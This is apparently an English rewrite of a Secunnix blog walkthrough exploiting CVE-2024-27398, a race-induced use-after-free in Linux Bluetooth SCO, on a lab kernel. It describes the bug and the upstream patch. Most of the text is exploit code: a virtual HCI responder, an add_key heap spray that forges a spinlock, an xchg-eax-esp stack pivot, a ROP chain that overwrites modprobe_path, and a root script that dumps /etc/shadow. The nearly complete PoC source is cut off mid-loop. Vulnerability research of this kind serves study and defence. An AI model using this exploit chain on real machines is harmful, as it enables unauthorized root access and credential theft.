CVE-2024-27398: Exploiting a Linux Bluetooth SCO Use-After-Free with SMEP Bypass

Source attribution. This is an original English rewrite of “CVE-2024-27398 — Exploiting a Linux Bluetooth SCO Use-After-Free with SMEP Bypass”, published on Secunnix Cyber Security on 2026-04-25 (author not clearly listed — byline reads “Yayıncı: Anonymous”). The original carries an “All rights reserved” notice (© Secunnix Cyber Security — Tüm hakları saklıdır.), so this is a paraphrased English rewrite, not a verbatim translation. All figures, code samples, and the POC animation are reproduced from the original at their original positions, with credit. Vulnerability research credited to the upstream PoC author sty886; the original article also credits lkmidas for the modprobe_path root technique.

Header image — CVE-2024-27398 Linux Bluetooth SCO UAF article — Header image for the original Secunnix walkthrough. *Source: original article.*

Executive Summary

CVE-2024-27398 is a race-induced use-after-free in the Linux kernel’s Bluetooth SCO (Synchronous Connection-Oriented link) subsystem, fixed in Linux 6.8.2+. Two concurrent connect() calls on the same SCO socket can be raced into creating two sco_conn objects with two independent delayed_work timers; close() only cancels the timer attached to the surviving connection, leaving the other orphan timer pending against an sk that gets freed. About two seconds later the orphan timer fires inside sco_sock_timeout(), walks sk->sk_lock, reads sk->sk_err, and invokes sk->sk_state_change(sk) — an arbitrary function pointer that, by then, the attacker controls.

The Secunnix walkthrough chains the bug into a clean local privilege escalation on a tuned 6.8.0 lab kernel. Heap spray is done with add_key(2) — user_key_payload headers are 24 bytes, so a 980-byte payload lands in kmalloc-1024, the same merged cache the freed sco_pinfo came from. The spray forges a valid-looking DEBUG_SPINLOCK at offset 0x80 (so do_raw_spin_lock‘s magic check passes) and overwrites the sk_state_change function pointer with the address of an xchg eax, esp ; ret gadget in kernel text. When the timer fires, the swap pivots the kernel stack into a userspace page mapped at 0x81011000, and a pure-ROP chain calls memcpy(modprobe_path, "/tmp/x", 7). Executing an invalid-magic binary triggers call_usermodehelper, which runs the attacker’s script as root. SMEP is bypassed because no userspace code is executed — every instruction runs from .text; SMAP is disabled in the lab so the kernel can read the userspace ROP chain. The article walks through the bug, the lab, the structure layout, the spray, the gadget, the chain, the patch, and provides the full annotated POC.

Introduction

The original author opens by saying they stumbled across a minimal PoC for CVE-2024-27398 in sty886/sco-race-condition — just enough code to trigger the race — and decided to take it the rest of the way: heap-spray to reclaim the freed slot, forge the spinlock pattern, build a pivot, and turn it into root. All screenshots in this post are captured live from real QEMU/KVM runs against a custom Linux 6.8 lab kernel. The intended reader is comfortable with the SLUB allocator, can read C and x86-64 assembly fluently, and wants to see why every choice was made, not just what was done.

1. The Vulnerability

1.1 Vulnerable code

The bug lives in net/bluetooth/sco.c‘s sco_sock_timeout(), scheduled as delayed_work on the system workqueue whenever an SCO connection attempt is allowed to time out. The handler takes the per-socket spinlock, sets an error, and invokes the socket’s state-change callback:

static void sco_sock_timeout(struct work_struct *work)
{
    struct sco_conn *conn = container_of(work, struct sco_conn,
                                         timeout_work.work);
    struct sock *sk;

    sk = conn->sk;
    if (!sk)
        return;

    bh_lock_sock(sk);           /* [1] acquires sk->sk_lock.slock */
    sk->sk_err = ETIMEDOUT;
    sk->sk_state_change(sk);    /* [2] ← function pointer call     */
    bh_unlock_sock(sk);
    sock_put(sk);               /* [3] drops refcount               */
}

If sk has been freed and its slot reclaimed by an attacker-controlled allocation by the time the timer fires, sk->sk_state_change is whatever the attacker wrote — arbitrary kernel-mode RIP control.

1.2 The race condition

Two concurrent connect() calls on the same SCO socket can each create their own sco_conn and schedule their own timer. The trimmed-down diff that summarises where the locking went wrong:

 sco_connect() inside sco_sock_connect():
-    lock_sock(sk);         /* was here: serialized connect attempts */

     err = sco_chan_add(conn, sk, NULL);
     if (sk->sk_state == BT_CONNECTED)
         sco_sock_set_timer(sk, sk->sk_sndtimeo);

-    release_sock(sk);

And in sco_sock_connect() itself:

+    lock_sock(sk);
     if (sk->sk_state != BT_OPEN && sk->sk_state != BT_BOUND) {
+        release_sock(sk);
         return -EBADFD;
     }
-    lock_sock(sk);
     bacpy(&sco_pi(sk)->dst, &sa->sco_bdaddr);
-    release_sock(sk);

     err = sco_connect(sk);
-    lock_sock(sk);
     err = bt_sock_wait_state(...);

1.3 Race timeline

Two threads, two different destination addresses, simultaneous connect(). Both create a sco_conn and arm a 2-second timer. The last write to sco_pi(sk)->conn wins. When the userspace caller closes the socket, only that surviving connection’s timer is cancelled; the other timer keeps pointing at conn->sk, which is freed roughly straight away. Two seconds later, the orphan timer’s callback executes against memory the attacker now controls.

1.4 The official patch

Linux 6.8.2 fixed this with three coordinated changes: (1) a sco_conn_lock mutex to serialise access; (2) sock_hold(sk) before the timer is scheduled and sock_put(sk) at the end of sco_sock_timeout(), so the socket can’t be freed underneath the timer; (3) replacing async cancel_delayed_work() with cancel_delayed_work_sync() so teardown waits for any already-running timer handler to finish.

2. Lab Setup

2.1 Kernel configuration

A custom Linux 6.8 build with a few deliberate choices. Bluetooth compiled in (CONFIG_BT=y, CONFIG_BT_BREDR=y, CONFIG_BT_HCIVHCI=y for /dev/vhci). SLUB enabled, CONFIG_SLAB_MERGE_DEFAULT=y. Crucially, CONFIG_KASAN=n and CONFIG_MEMCG_KMEM=n: with either of those enabled, the SCO cache wouldn’t merge into the generic kmalloc-1024 and the add_key spray would never reach the freed slot. CONFIG_DEBUG_SPINLOCK=y widens the race window and pushes sco_pinfo into the 1024-byte cache. CONFIG_LOCKDEP=n stops the lock validator from tripping on the synthetic spinlock that lives inside the spray payload.

2.2 QEMU launch parameters

qemu-system-x86_64 
    -m 4096 
    -smp 2 
    -cpu host,+smep,-smap 
    -enable-kvm 
    -kernel linux-6.8/arch/x86/boot/bzImage 
    -initrd exploit.cpio.gz 
    -append "console=ttyS0 nokaslr loglevel=7 
             panic_on_oops=0 hung_task_timeout_secs=0 
             lockdep=off" 
    -nographic 
    -no-reboot

Parameter	Reason
`-cpu host,+smep,-smap`	SMEP on (forces pure-ROP); SMAP off (kernel reads userspace pivot page)
`nokaslr`	All kernel addresses fixed — no info leak needed
`panic_on_oops=0`	Kernel oops at `RIP=0x0` does not kill the machine — exploit continues
`lockdep=off`	Lock validator would trip on the fake-but-valid spinlock spray data
`-smp 2`	Two CPUs required for the race to be meaningful

Lab QEMU parameters. Source: original article.

3. Target Structure Analysis

3.1 `struct sco_pinfo` layout

struct sco_pinfo {
    struct sock    sk;       /* must be first — pointer cast magic */
    bdaddr_t       src;
    bdaddr_t       dst;
    __u32          flags;
    __u16          setting;
    __u8           cmsg_mask;
    struct bt_codec codec;
    struct sco_conn *conn;
};

With CONFIG_DEBUG_SPINLOCK=y, spinlock_t expands from 4 bytes to 24 bytes (adding magic, owner_cpu, owner for debugging). That inflates struct sock and pushes sco_pinfo to 984 bytes — SLUB rounds it to kmalloc-1024.

3.2 Critical offsets in `struct sock`

$ pahole -C sco_pinfo vmlinux
struct sco_pinfo {
    struct sock  sk;     /* 0   904 */
    ...                  /* 904  80 */
    /* size: 984, cachelines: 16, members: 7 */
};

$ pahole -C sock vmlinux | grep -E "sk_lock|sk_state_change"
    socket_lock_t  sk_lock;              /*  152    72 */
    void (*sk_state_change)(struct sock *); /* 824     8 */

So sk_lock sits at offset 0x98 (152) and sk_state_change at 0x338 (824).

3.3 `socket_lock_t` internals (DEBUG_SPINLOCK=y)

socket_lock_t (72 bytes total):
  +0x00  spinlock_t slock (24 bytes):
           +0x00  raw_lock.val   (4B)  ← 0 = unlocked
           +0x04  magic          (4B)  ← MUST be 0xdead4ead
           +0x08  owner_cpu      (4B)  ← -1 = unowned
           +0x0C  pad            (4B)
           +0x10  owner          (8B)  ← (void*)-1 = unowned
  +0x18  owned                  (4B)
  +0x1C  pad                    (4B)
  +0x20  wq (wait_queue_head_t) (40B)

The magic field is checked by do_raw_spin_lock() on every acquisition. If it doesn’t equal 0xdead4ead, the kernel warns and may panic. The spray has to forge this faithfully or the chain dies before reaching sk_state_change.

4. Exploit Stage 1: Triggering the UAF

4.1 Virtual HCI setup

No real Bluetooth hardware is needed. /dev/vhci exposes a virtual HCI controller; the exploit just has to answer the HCI command stream the kernel issues during stack init:

/* Open virtual HCI device */
vfd = open("/dev/vhci", O_RDWR);

/* Initialize as BR/EDR controller */
uint8_t vp[2] = {0xff, 0};
write(vfd, vp, 2);
usleep(200000);

/* Start HCI command response thread */
pthread_create(&vt, NULL, vhci_thread, NULL);
usleep(500000);

/* Bring up the hci0 interface */
int hfd = socket(AF_BLUETOOTH, SOCK_RAW, BTPROTO_HCI);
ioctl(hfd, HCIDEVUP, 0);   /* _IOW(0x48, 201, int) */
close(hfd);

sleep(4);  /* wait for HCI initialization sequence to complete */
printf("[*] HCI readyn");

The vHCI thread answers HCI_Create_Connection by forging a Connection-Complete event with handle = 1, so the kernel state machine moves forward without ever talking to a real radio:

case 0x0401: {  /* HCI_Create_Connection */
    uint8_t ev[20] = {0};
    ev[0] = 4;     /* HCI_EVENT_PKT */
    ev[1] = 0x03;  /* HCI_EV_CONN_COMPLETE */
    ev[2] = 11;    /* parameter length */
    ev[3] = 0;     /* status = success */
    ev[4] = 0x01; ev[5] = 0x00;   /* handle = 1 */
    memcpy(&ev[6], &buf[4], 6);   /* copy BD_ADDR from command */
    ev[12] = 0x01; ev[13] = 0x00; /* link type = ACL, enc = off */
    write(vfd, ev, 14);
    break;
}

Figure 1 — Exploit startup. xchg eax,esp gadget at 0xffffffff81011cf1 selected and two userspace pages mapped — Figure 1 — exploit startup; the `xchg eax, esp` gadget at `0xffffffff81011cf1` is selected as the stack pivot, two userspace pages are mapped. *Source: original article.*

Figure 2 — HCI ready: virtual Bluetooth controller hci0 is up via /dev/vhci — Figure 2 — “HCI ready”; the virtual Bluetooth controller is up via `/dev/vhci`. *Source: original article.*

4.2 Race trigger per iteration

Per race attempt: open an SCO socket, set a 2-second send timeout, spin up two threads that connect() simultaneously to two different destination addresses (one all-zeros, one all-ones), join, close, then spray:

for (int batch = 0; batch < 100; batch++) {
    /* 2000 race attempts + 2000 add_key calls per batch */
    for (int i = 0; i < BATCH_SZ; i++) {
        /* [1] Trigger race → create orphan timer → free sk */
        g_fd = socket(AF_BLUETOOTH, SOCK_SEQPACKET|SOCK_NONBLOCK, BTPROTO_SCO);
        setsockopt(g_fd, SOL_SOCKET, SO_SNDTIMEO, &tv, sizeof(tv));
        pthread_barrier_init(&g_bar, NULL, 2);
        pthread_create(&t1, NULL, c1, NULL);
        pthread_create(&t2, NULL, c2, NULL);
        pthread_join(t1, NULL); pthread_join(t2, NULL);
        pthread_barrier_destroy(&g_bar);
        close(g_fd);  /* ← sk freed here */

        /* [2] Spray — try to land in the freed slot */
        char desc[32];
        snprintf(desc, sizeof(desc), "s%d_%d", batch, i);
        syscall(__NR_add_key, "user", desc, g_kd, sizeof(g_kd), KEY_SPEC_SESSION_KEYRING);
    }

    /* [3] Wait for orphan timers to fire */
    printf("[*] Waiting 3s...n");
    sleep(3);

    /* [4] Trigger modprobe if modprobe_path was overwritten */
    for (int t = 0; t < 5; t++) {
        system("/tmp/dummy 2>/dev/null; true");
        usleep(500000);
        if (access("/tmp/pwn", F_OK) == 0) goto win;
    }
}

Figure 3 — Batch 0 in progress, creating SCO sockets and racing connects — Figure 3 — race-and-spray loop, Batch 0 in progress. Each iteration creates a fresh SCO socket and races two simultaneous `connect()` calls. *Source: original article.*

Figure 4 — Waiting 3 seconds for the SO_SNDTIMEO=2s orphan timer to fire on freed memory — Figure 4 — after 2000 iterations the exploit waits 3 seconds for the `SO_SNDTIMEO=2s` timer to fire against freed memory. *Source: original article.*

5. Exploit Stage 2: Heap Spray via `add_key`

5.1 Why `add_key`?

The add_key(2) syscall with key type "user" allocates a user_key_payload (24-byte header) plus the caller’s payload. With datalen = 980 the total allocation is 1004 bytes — rounded up to kmalloc-1024, the same merged cache the freed sco_pinfo lives in (when KASAN/MEMCG are off).

5.2 Spray payload layout

Allocation layout (1024 bytes total):
┌──────────────────────────────────────────────────────┐
│ user_key_payload header (24 bytes)                    │
│   +0x00 rcu_head (16B) │ datalen (2B) │ pad (6B)     │
├──────────────────────────────────────────────────────┤  ← payload_data[0]
│ [maps to sk+0x18]                                    │
│   ...                                                │
│ [maps to sk+0x98 = sk_lock.slock]                    │
│   payload_data[0x80]  raw_lock   = 0x00000000        │  ← unlocked
│   payload_data[0x84]  magic      = 0xdead4ead        │  ← REQUIRED
│   payload_data[0x88]  owner_cpu  = 0xffffffff        │  ← -1 (unowned)
│   payload_data[0x8c]  pad        = 0x00000000        │
│   payload_data[0x90]  owner      = 0xffffffffffffffff│  ← (void*)-1
│   ...                                                │
│ [maps to sk+0x338 = sk_state_change]                 │
│   payload_data[0x320] = 0xffffffff81011cf1           │  ← our gadget
└──────────────────────────────────────────────────────┘

static char g_kd[980];

static void build_spray(void) {
    memset(g_kd, 0, sizeof(g_kd));
    int h = 24;  /* user_key_payload header size */

    /* sk+0x98: valid unlocked DEBUG_SPINLOCK */
    int slock = SK_LOCK_OFF - h;  /* 0x98 - 0x18 = 0x80 */
    *(uint32_t*)(g_kd + slock + 0)  = 0;           /* raw_lock = unlocked */
    *(uint32_t*)(g_kd + slock + 4)  = 0xdead4ead;  /* magic — checked by kernel */
    *(uint32_t*)(g_kd + slock + 8)  = 0xffffffff;  /* owner_cpu = -1 */
    *(uint32_t*)(g_kd + slock + 12) = 0;
    *(uint64_t*)(g_kd + slock + 16) = (uint64_t)-1; /* owner = -1 */

    /* sk+0x338: overwrite sk_state_change with our pivot gadget */
    *(uint64_t*)(g_kd + SK_STCHG_OFF - h) = XCHG_EAX_ESP;
    /* SK_STCHG_OFF=0x338, h=0x18, so payload_data[0x320] = gadget addr */
}

5.3 The spray loop

100 batches × 2000 iterations. Each iteration triggers the race, closes the socket, sprays once with add_key. Between batches, sleep 3 s so the SO_SNDTIMEO=2s timers can fire, then up to five attempts to launch /tmp/dummy — if modprobe_path was overwritten, the kernel will dispatch the attacker’s script and /tmp/pwn will appear.

6. Exploit Stage 3: UAF Fires — KASAN Detection

On a KASAN-enabled build, the UAF is loud: when the orphan timer runs, do_raw_spin_lock reads the freed spinlock’s magic field and KASAN catches the access. The workqueue context (sco_sock_timeout) is explicitly labelled in the report. On the exploitation kernel (KASAN off), the same access is silent: the spray has forged 0xdead4ead, the magic check passes, the lock is “taken”, and execution carries on to the function pointer call.

Figure 5 — KASAN report: BUG: KASAN: slab-use-after-free in do_raw_spin_lock — Figure 5 — `BUG: KASAN: slab-use-after-free in do_raw_spin_lock` — the orphan timer dereferences a freed `sk`. *Source: original article.*

Figure 6 — Same KASAN run showing sco_sock_timeout workqueue context — Figure 6 — same KASAN run, showing the `sco_sock_timeout` workqueue context. *Source: original article.*

7. Exploit Stage 4: SMEP Bypass via `xchg eax, esp`

7.1 Why we can’t jump to shellcode

SMEP (Supervisor Mode Execution Prevention) faults if the kernel’s RIP ever lands on a userspace address. A naive callback-to-userspace-shellcode primitive cannot work. ROP solves it: every instruction executes from kernel .text; ROP just reads chain data from userspace memory, which SMEP is fine with (SMAP would object, but SMAP is off here).

7.2 The `xchg eax, esp ; ret` gadget

Two bytes — 94 c3 — appear at 0xffffffff81011cf1. When the kernel jumps there via sk_state_change(sk), RAX is the gadget’s own address. The instruction swaps the low 32 bits of RAX and RSP; RSP is then zero-extended from 0x81011cf1 to 0x0000000081011cf1 — a userspace address. The subsequent ret reads the first ROP gadget from that userspace page.

7.3 Mapping the pivot page

Two consecutive userspace pages at 0x81011000–0x81012fff are mmap’d with MAP_FIXED to hold the chain. SMEP doesn’t prevent the kernel from reading them; SMAP is off, so it doesn’t prevent that either.

7.4 Building the ROP chain

/* Kernel #23 (6.8.0, no KASAN, nokaslr) gadget addresses */
#define POP_RDI_RET    0xffffffff8104c1adUL  /* pop rdi; ret */
#define POP_RSI_RET    0xffffffff811bb9beUL  /* pop rsi; ret */
#define POP_RDX_RET    0xffffffff810bc1b2UL  /* pop rdx; ret */
#define MEMCPY_ADDR    0xffffffff82905e70UL  /* kernel memcpy */
#define MODPROBE_PATH  0xffffffff8356a020UL  /* modprobe_path symbol */
#define STRING_PAGE    0xdead0000UL          /* userspace: "/tmp/x" */

uint64_t *rop = (uint64_t*)(PIVOT_ADDR);    /* 0x81011cf1 */

rop[0] = POP_RDI_RET;    /* pop rdi; ret           */
rop[1] = MODPROBE_PATH;  /*   rdi = &modprobe_path  */
rop[2] = POP_RSI_RET;    /* pop rsi; ret           */
rop[3] = STRING_PAGE;    /*   rsi = 0xdead0000 ("/tmp/x") */
rop[4] = POP_RDX_RET;    /* pop rdx; ret           */
rop[5] = 7;              /*   rdx = 7               */
rop[6] = MEMCPY_ADDR;    /* memcpy(dst, src, len)  */
rop[7] = XCHG_EAX_ESP + 1; /* 0xffffffff81011cf2: just 'ret' */
                            /* cascade into zeroed memory → RIP=0 → oops */

0x81011000  [page boundary]
    ...
0x81011cf1  rop[0] = 0xffffffff8104c1ad  pop rdi; ret
0x81011cf9  rop[1] = 0xffffffff8356a020  modprobe_path
0x81011d01  rop[2] = 0xffffffff811bb9be  pop rsi; ret
0x81011d09  rop[3] = 0x00000000dead0000  STRING_PAGE
0x81011d11  rop[4] = 0xffffffff810bc1b2  pop rdx; ret
0x81011d19  rop[5] = 0x0000000000000007  length = 7
0x81011d21  rop[6] = 0xffffffff82905e70  memcpy
0x81011d29  rop[7] = 0xffffffff81011cf2  trailing ret
0x81011d31  0x0000000000000000           ← crash here (RIP=0)
    ...
0x81013000  [page boundary]

8. Exploit Stage 5: RIP Control and Kernel Oops

The sequence at firing time:

bh_lock_sock(sk) reads the forged magic = 0xdead4ead, the magic check passes, “lock acquired”.
sk->sk_err = ETIMEDOUT — harmless write.
sk->sk_state_change(sk) jumps to our xchg eax, esp ; ret gadget.
xchg swaps RAX and RSP, redirecting the kernel stack into userspace.
ret loads the first ROP gadget address from 0x81011cf1.
The three pop reg ; ret gadgets stage RDI, RSI, RDX.
memcpy(modprobe_path, "/tmp/x", 7) runs in kernel context.
Trailing rets cascade into zeroed memory until RIP = 0x0 and the kernel oopses. Because panic_on_oops=0, the machine survives, and the offending task is killed.

Figure 7 — Kernel oops dump showing RIP=0x0 after the trailing ret sled — Figure 7 — kernel oops dump; `RIP=0x0000000000000000` after the ROP chain’s trailing `ret` sled drops into zeroed memory. *Source: original article.*

Figure 8 — RSP=0x0000000081011d39 after the xchg eax,esp gadget pivots the stack into userspace — Figure 8 — `RSP=0x0000000081011d39` after the `xchg eax, esp` pivots the kernel stack into userspace where the ROP chain lives. *Source: original article.*

Figure 9 — After memcpy returns, RAX = 0xffffffff8356a020 (modprobe_path) — Figure 9 — `memcpy()` returns; `RAX` holds `modprobe_path` — proof the chain ran inside the kernel. *Source: original article.*

9. Exploit Stage 6: Root via `modprobe_path`

9.1 How `modprobe_path` gives us root

When the kernel encounters an unrecognised binary format (the canonical trigger: an executable whose first 4 bytes don’t match any registered handler), it calls request_module("binfmt-XXXX"), which internally invokes call_usermodehelper(modprobe_path, ...) as root, bypassing all userspace privilege checks. modprobe_path normally points to /sbin/modprobe. Overwriting it to /tmp/x means the kernel runs the attacker’s shell script as uid=0.

9.2 The root script

FILE *f = fopen("/tmp/x", "w");
fprintf(f,
    "#!/bin/shn"
    "echo '=== CVE-2024-27398 ROOT ===' > /tmp/pwnn"
    "uname -a >> /tmp/pwnn"
    "id >> /tmp/pwnn"
    "echo '--- /etc/shadow ---' >> /tmp/pwnn"
    "cat /etc/shadow >> /tmp/pwn 2>/dev/nulln"
    "echo '--- ROOTED ---' >> /tmp/pwnn");
fclose(f);
chmod("/tmp/x", 0755);

int d = open("/tmp/dummy", O_CREAT|O_WRONLY|O_TRUNC, 0755);
write(d, "xffxffxffxff", 4);  /* invalid ELF magic */
close(d);

9.3 Triggering and confirming root

After each 3-second wait, the exploit invokes /tmp/dummy up to five times. The kernel sees an unrecognised binary format, calls request_module(), which calls call_usermodehelper("/tmp/x", ...) as root, which runs the script — which writes the uid=0 banner into /tmp/pwn. The exploit then access("/tmp/pwn"); if it exists, root was achieved.

Figure 10 — ROOT achieved, SMEP bypass — contents of /tmp/pwn showing uid=0 — Figure 10 — `[!!!] ROOT! (SMEP BYPASS)`; `/tmp/pwn` contains the banner written by the script the kernel just ran on our behalf. *Source: original article.*

10. Full Exploit Source

Animated POC of CVE-2024-27398 exploit ending in root — Animated POC — full exploit run ending in root. *Source: original article.*

The complete annotated C source, reproduced verbatim from the original article:

/*
 * CVE-2024-27398 LPE — SMEP BYPASS via xchg eax,esp pivot + pure ROP
 *
 * Vulnerability: Use-After-Free in sco_sock_timeout() via race in
 * sco_sock_connect()/sco_connect() — missing lock_sock serialization.
 *
 * Technique:
 *   sk_state_change = xchg_eax_esp_ret (0xffffffff81011cf1)
 *   xchg eax, esp → RSP = 0x81011cf1 (mmap'd userspace page)
 *   ROP: pop rdi/rsi/rdx → memcpy(modprobe_path, "/tmp/x", 7)
 *   All gadgets in kernel .text → SMEP bypassed
 *   SMAP must be off (nosmap) → kernel reads userspace ROP data
 *
 * Target: Linux 6.8.0 #23, CONFIG_KASAN=n, CONFIG_MEMCG_KMEM=n,
 *         CONFIG_DEBUG_SPINLOCK=y, nokaslr, SMEP on, SMAP off
 */
#define _GNU_SOURCE
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/stat.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <pthread.h>
#include <stdio.h>
#include <stdint.h>
#include <poll.h>

/* ── Kernel symbol and gadget addresses (6.8.0 #23, nokaslr) ───────────── */
#define XCHG_EAX_ESP   0xffffffff81011cf1UL  /* 94 c3: xchg eax,esp; ret */
#define PIVOT_ADDR     (XCHG_EAX_ESP & 0xFFFFFFFF)  /* → 0x81011cf1     */
#define POP_RDI_RET    0xffffffff8104c1adUL  /* 5f c3: pop rdi; ret      */
#define POP_RSI_RET    0xffffffff811bb9beUL  /* 5e c3: pop rsi; ret      */
#define POP_RDX_RET    0xffffffff810bc1b2UL  /* 5a c3: pop rdx; ret      */
#define MEMCPY_ADDR    0xffffffff82905e70UL  /* kernel memcpy()           */
#define MODPROBE_PATH  0xffffffff8356a020UL  /* char modprobe_path[256]   */
#define STRING_PAGE    0xdead0000UL          /* userspace page: "/tmp/x"  */

/* ── struct sock field offsets ──────────────────────────────────────── */
#define SK_LOCK_OFF    0x98   /* socket_lock_t sk_lock  (pahole verified) */
#define SK_STCHG_OFF   0x338  /* sk_state_change fptr   (pahole verified) */

#define PG             4096
#define BTPROTO_HCI    1
#define BTPROTO_SCO    2
#define BATCH_SZ       2000

typedef struct { uint8_t b[6]; } __attribute__((packed)) bdaddr_t;
struct sockaddr_sco { sa_family_t f; bdaddr_t a; uint16_t t; };

/* ── vHCI state ─────────────────────────────────────────────────────── */
static int vfd;
static volatile int vstop = 0;

/* Respond to HCI commands issued by the kernel during BT stack init */
static void *vhci_thread(void *a) {
    uint8_t buf[512], resp[300], extra[248];
    struct pollfd pf = {.fd = vfd, .events = POLLIN};

    while (!vstop) {
        if (poll(&pf, 1, 100) <= 0) continue;
        int n = read(vfd, buf, sizeof(buf));
        if (n < 4 || buf[0] != 1) continue;  /* must be HCI_COMMAND_PKT */

        memset(extra, 0, sizeof(extra));
        int el = 248;
        uint16_t op = buf[1] | (buf[2] << 8);

        switch (op) {
        case 0x1001: extra[0]=11; extra[3]=11; extra[4]=10; break;
        case 0x1009: extra[0]=0xAA; extra[1]=0xBB; extra[2]=0xCC;
                     extra[3]=0xDD; extra[4]=0xEE; extra[5]=0xFF; break;
        case 0x1002: memset(extra, 0xff, 64); break;
        case 0x1003: extra[0]=0xff; extra[1]=0xff; extra[2]=0x8f;
                     extra[3]=0xfe; extra[4]=0xdb; extra[5]=0xff;
                     extra[6]=0x5b; extra[7]=0x87; break;
        case 0x1004: case 0x1005:
                     extra[0] = n > 4 ? buf[4] : 0;
                     extra[1] = 1; memset(&extra[2], 0xff, 8); break;
        case 0x100b: extra[0]=0xff; extra[1]=0x03; extra[2]=0xff;
                     extra[3]=0x0a; extra[5]=0x08; break;
        case 0x0c14: memcpy(extra, "vhci", 4); break;
        case 0x200b: case 0x200c: memset(extra, 0xff, 8); break;
        case 0x2003: extra[0]=0xfb; extra[2]=0x0f; break;
        case 0x0406: el = 8; break;

        case 0x0401: { /* HCI_Create_Connection → send Connection Complete */
            uint8_t ev[20] = {0};
            ev[0]=4; ev[1]=0x03; ev[2]=11; ev[3]=0;
            ev[4]=0x01; ev[5]=0x00;           /* handle = 1 */
            if (n >= 10) memcpy(&ev[6], &buf[4], 6);
            ev[12]=0x01; ev[13]=0x00;
            write(vfd, ev, 14);
            break;
        }
        default: el = 8; break;
        }

        int pl = 4 + el;
        if (pl > 255) pl = 255;
        resp[0]=4; resp[1]=0x0e; resp[2]=pl; resp[3]=1;
        resp[4]=buf[1]; resp[5]=buf[2]; resp[6]=0;
        if (el > 0) memcpy(&resp[7], extra, pl - 4);
        write(vfd, resp, 3 + pl);
    }
    return NULL;
}

/* ── Race threads ────────────────────────────────────────────────── */
static int g_fd;
static pthread_barrier_t g_bar;

static void *c1(void *a) {
    struct sockaddr_sco sa = {.f = AF_BLUETOOTH};  /* dst = 00:00:...:00 */
    pthread_barrier_wait(&g_bar);
    connect(g_fd, (struct sockaddr*)&sa, sizeof(sa));
    return NULL;
}

static void *c2(void *a) {
    struct sockaddr_sco sa = {.f = AF_BLUETOOTH};
    memset(&sa.a, 0xff, 6);                        /* dst = FF:FF:...:FF */
    pthread_barrier_wait(&g_bar);
    connect(g_fd, (struct sockaddr*)&sa, sizeof(sa));
    return NULL;
}

/* ── Heap spray payload ──────────────────────────────────────────── */
static char g_kd[980];

static void build_spray(void) {
    memset(g_kd, 0, sizeof(g_kd));
    int h = 24;  /* sizeof(struct user_key_payload) header */

    /*
     * Overwrite sk_lock.slock with a valid-looking unlocked spinlock.
     * bh_lock_sock() reads magic (must be 0xdead4ead) and checks
     * owner_cpu/-1. Without this, the kernel panics before reaching
     * sk_state_change.
     */
    int slock = SK_LOCK_OFF - h;   /* 0x98 - 0x18 = 0x80 */
    *(uint32_t*)(g_kd + slock + 0)  = 0;            /* raw_lock = 0 */
    *(uint32_t*)(g_kd + slock + 4)  = 0xdead4ead;   /* magic */
    *(uint32_t*)(g_kd + slock + 8)  = 0xffffffff;   /* owner_cpu = -1 */
    *(uint32_t*)(g_kd + slock + 12) = 0;
    *(uint64_t*)(g_kd + slock + 16) = (uint64_t)-1; /* owner = -1 */

    /* Overwrite sk_state_change with our stack pivot gadget */
    *(uint64_t*)(g_kd + SK_STCHG_OFF - h) = XCHG_EAX_ESP;
}

int main(void) {
    printf("=== CVE-2024-27398 LPE (SMEP BYPASS) ===n");
    fflush(stdout);

    /* [1] Create root payload script */
    FILE *f = fopen("/tmp/x", "w");
    if (f) {
        fprintf(f,
            "#!/bin/shn"
            "echo '=== CVE-2024-27398 ROOT ===' > /tmp/pwnn"
            "uname -a >> /tmp/pwnn"
            "id >> /tmp/pwnn"
            "echo '--- /etc/shadow ---' >> /tmp/pwnn"
            "cat /etc/shadow >> /tmp/pwn 2>/dev/nulln"
            "echo '--- ROOTED ---' >> /tmp/pwnn");
        fclose(f);
    }
    chmod("/tmp/x", 0755);

    /* [2] Create invalid-magic binary to trigger modprobe */
    {
        int d = open("/tmp/dummy", O_CREAT|O_WRONLY|O_TRUNC, 0755);
        if (d >= 0) { write(d, "xffxffxffxff", 4); close(d); }
    }

    /* [3] Map string page (nosmap: kernel reads this during memcpy) */
    void *sp = mmap((void*)STRING_PAGE, PG, PROT_READ|PROT_WRITE,
                    MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
    memcpy(sp, "/tmp/x", 7);

    /* [4] Map pivot page and write ROP chain */
    void *pivot_page = (void*)(PIVOT_ADDR & ~0xFFFUL);
    void *pp = mmap(pivot_page, 2*PG, PROT_READ|PROT_WRITE,
                    MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
    if (pp == MAP_FAILED) { perror("mmap pivot"); return 1; }
    memset(pp, 0, 2*PG);

    uint64_t *rop = (uint64_t*)(PIVOT_ADDR);
    rop[0] = POP_RDI_RET;
    rop[1] = MODPROBE_PATH;        /* rdi = &modprobe_path */
    rop[2] = POP_RSI_RET;
    rop[3] = STRING_PAGE;          /* rsi = "/tmp/x" (nosmap) */
    rop[4] = POP_RDX_RET;
    rop[5] = 7;                    /* rdx = 7 */
    rop[6] = MEMCPY_ADDR;          /* memcpy(modprobe_path, "/tmp/x", 7) */
    rop[7] = XCHG_EAX_ESP + 1;    /* trailing ret sled → eventual crash */

    printf("[+] Pivot page at %p, ROP at 0x%lxn", pp, PIVOT_ADDR);
    fflush(stdout);

    /* [5] Set up vHCI and bring up hci0 */
    build_spray();
    vfd = open("/dev/vhci", O_RDWR);
    if (vfd < 0) { perror("vhci"); return 1; }
    uint8_t vp[2] = {0xff, 0};
    write(vfd, vp, 2);
    usleep(200000);

    pthread_t vt;
    pthread_create(&vt, NULL, vhci_thread, NULL);
    usleep(500000);

    int hfd = socket(AF_BLUETOOTH, SOCK_RAW, BTPROTO_HCI);
    if (hfd >= 0) { ioctl(hfd, _IOW(0x48, 201, int), 0); close(hfd); }
    sleep(4);
    printf("[*] HCI readyn");
    fflush(stdout);

    /* [6] Main race + spray loop */
    char desc[32];
    struct timeval tv = {.tv_sec = 2};

    for (int batch = 0; batch < 100; batch++) {
        printf("[*] Batch %dn", batch);
        fflush(stdout);

        for (int i = 0; i < BATCH_SZ; i++) {
            g_fd = socket(AF_BLUETOOTH, SOCK_SEQPACKET|SOCK_NONBLOCK,
                          BTPROTO_SCO);
            if (g_fd < 0) continue;

            setsockopt(g_fd, SOL_SOCKET, SO_SNDTIMEO, &tv, sizeof(tv));

